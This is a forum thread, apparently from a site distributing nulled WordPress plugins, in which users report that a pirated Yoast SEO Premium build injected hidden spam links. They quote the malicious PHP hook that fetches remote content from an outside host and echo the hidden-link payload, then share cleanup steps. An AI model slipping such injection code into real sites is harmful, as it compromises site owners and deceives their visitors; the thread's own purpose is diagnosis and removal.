Yoast SEO Premium - Best Seo Plugin For WP

Yoast SEO Premium - Best Seo Plugin For WP v24.9 Nulled

No permission to download

alexpl

New member
Oct 31, 2019
8
2
3
its infected bro...on /inc/wpseo-functions.php in line 35 its add

PHP:
add_action('wp_body_open', function(){ if(is_category()||is_front_page()||is_home()){echo file_get_contents('https://wordpresss.store/20210101.txt');}});
123.jpg

then its fetch the content
PHP:
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">
<a style="font-size:18px;" href="https://downapkmod.com/" title="https://downapkmod.com/">https://downapkmod.com/</a>,
<a style="font-size:18px;" href="https://apkcop.com/" title="https://apkcop.com/">https://apkcop.com/</a>
</div>

your category pages, Homepages then injected with hidden links to

Code:
https://downapkmod.com/

https://apkcop.com/

What is the best way to remove this?
Just used the scan on sucuri and noticed it is indeed found on my website
 

poe87

Member
Aug 12, 2020
60
16
8
What is the best way to remove this?
Just used the scan on sucuri and noticed it is indeed found on my website
The latest fixed version by TassieNZ doesn't have that code. Or i check another file? "wp-content/plugins/wordpress-seo-premium/vendor/yoast/wordpress-seo/inc/wpseo-functions.php" right ?
 

Attachments

  • wpseo.jpg
    wpseo.jpg
    54.6 KB · Views: 30
  • Love
Reactions: TassieNZ

alexpl

New member
Oct 31, 2019
8
2
3
The latest fixed version by TassieNZ doesn't have that code. Or i check another file? "wp-content/plugins/wordpress-seo-premium/vendor/yoast/wordpress-seo/inc/wpseo-functions.php" right ?

Yes indeed, however I had already installed the previous version. After removing the "corrupt" Yoast version and installing the new one, those links are still inside my homepage (you can check yourself by checking the page source of your homepage and look for <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"> )
 

poe87

Member
Aug 12, 2020
60
16
8
..look for <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"> )
Luckily i didn't get it (even if i had installed the previous version of this plugin), you might want to restore a backup, i think your whole site might be infected now if you still get that in your source code even if you removed the infected file.
Also are you sure you didn't try this plugin from another source/website ?

Edit: I did a sucuri scan on website homepage and it comes as clean.
Edit2: I just checked, previous version didn't have it either (even if you get a warning from it in virustotal it's from some encoded code in another file that seems harmless). Pretty sure you got it from somewhere else.
 
Last edited:

nesym

Active member
Babiato Lover
Sep 8, 2019
365
191
43
Yes indeed, however I had already installed the previous version. After removing the "corrupt" Yoast version and installing the new one, those links are still inside my homepage (you can check yourself by checking the page source of your homepage and look for <div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;"> )

Sadly I can confirm that I am not an idiot and only download Yoast from the page "Updates" with the official versions here. I also have the same exact worm only on the websites I had added the yoast plugin. Thank you for reporting it! I'll investigate deeply and share what I found later. Okey, turns out it's not in the last 2 versions downloaded from here but I can't tell for the older versions.

You can use THIS TOOL to report both of the APK websites and punish their ranking for years.

EDIT:

OK, my investigation shows that only when WP-ROCKET is activated I get this additional code. Next step is to check the whole code of that thing. The worst case is that WP-ROCKET is not the problem and it's actually merging some stylesheet/js from external source.

EDIT 2:

It's not in the DB. Just made a full scan. It's probably injected by some plugin. I'll investigate more.

EDIT 3:

Removing the wp-rocket plugin, cleaning the htaccess and installing the latest version from Babiato fixed it.
 
Last edited:
  • Like
Reactions: poe87

alexpl

New member
Oct 31, 2019
8
2
3
Luckily i didn't get it (even if i had installed the previous version of this plugin), you might want to restore a backup, i think your whole site might be infected now if you still get that in your source code even if you removed the infected file.
Also are you sure you didn't try this plugin from another source/website ?

Edit: I did a sucuri scan on website homepage and it comes as clean.
Edit2: I just checked, previous version didn't have it either (even if you get a warning from it in virustotal it's from some encoded code in another file that seems harmless). Pretty sure you got it from somewhere else.

I am 100% sure I only downloaded from Babiato.
Also I have exactly the same links as mentioned by bdkalkun so i am afraid that can't be coincidence :(
 

poe87

Member
Aug 12, 2020
60
16
8
You can use THIS TOOL to report both of the APK websites and punish their ranking for years.
Did that too. If you share something then it's better to be open about it and ask for a link back in return or something rather than use malware code.

I am 100% sure I only downloaded from Babiato.
Also I have exactly the same links as mentioned by bdkalkun so i am afraid that can't be coincidence :(
Maybe you got something that was from some random user and not official uploaders. Or your site got attacked, dunno...
 

alexpl

New member
Oct 31, 2019
8
2
3
Sadly I can confirm that I am not an idiot and only download Yoast from the official versions here and I also have the same exact worm only on the websites I had added the yoast plugin. Thank you for reporting it! I'll investigate deeply and share what I found later. Okey, turns out it's not in the last 2 versions downloaded from here but I cant tell for the older versions.

You can use THIS TOOL to report both of the APK websites and punish their ranking for years.

EDIT:

OK, my investigations show me that only when WP-ROCKET is activated I get this additional code. Next step is to check the whole code of that thing. The worst case is that WP-ROCKET is not the problem and it's actually merging some stylesheet/js from external source.

I am also using WP Rocket (also download from babiato by the way) and can confirm that when deactivating the wp-rocket plugin the additional code is indeed gone
 

alexpl

New member
Oct 31, 2019
8
2
3
I managed to get it clean thanks to the post of nesym.

In case anyone else has the same issue, what I did:

- Deleted the WP rocket plugin
- Followed the instructions on how to delete according to the wp rocket site, so:
  • Delete the /wp-content/cache/ and /wp-content/wp-rocket-config/ folders
  • Delete the /wp-content/advanced-cache.php file
  • Edit the htaccess file, removing anything between #BEGIN WP ROCKET and #END WP ROCKET
  • Edit the wp-config.php file, setting the define('WP_CACHE', true) to false or removing the line
  • Delete the wp_rocket_settings entry, and the transients and cronjob in the WordPress options table of your Database (didn't need to do this)
After this I downloaded the latest WP rocket here from babiato, installed and activated.

Checked the source, everything ok.
Also performed a new test with the sitecheck from sucuri (make sure to perform a fresh test, there is a link underneath their page to force a re-scan to clear the cache) and it seems free of malware now
 
  • Like
Reactions: nesym

mmohamedyaser

Member
Feb 26, 2019
36
21
8
Dubai
My solution:
1. Remove the Yoast version
2. Install Yoast 15.3
3. Install the Yoast Test Helper plugin
4. In this plugin do the action: Reset indexables tables & migrations
5. Optimize SEO
6. Install Yoast 15.4, then 15.5 etc

It works for me
Thank you very much bro @masterabrh
This worked for me.
This also fixed the issue of not being able to install from wordpress repository. :)
 

superstar13

New member
Dec 9, 2020
5
-1
1
I'm still getting the error with SEO optimisation. Console states its a 403 error on the my.yoast.com... link

I've installed the latest version that was updated recently.

If I go back to 15.3, it resolves and I can optimise the SEO data but if I upgrade to 15.4, it stops working again.
 

otetatsuya

Member
Dec 26, 2020
45
20
8
Bali, Indonesia
agraphotobali.com
I'm still getting the error with SEO optimisation. Console states its a 403 error on the my.yoast.com... link

I've installed the latest version that was updated recently.

If I go back to 15.3, it resolves and I can optimise the SEO data but if I upgrade to 15.4, it stops working again.
You can go from 15.3 to the latest version, do the SEO opt, wait until the error appears, then refresh the page. Await a moment then it turns green.
It's work for me as I mentioned earlier in the previous thread's page.
 
  • Like
Reactions: superstar13

tanierlyons

Well-known member
Staff member
Administrative
Moderator
May 24, 2018
75,061
111,714
120

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu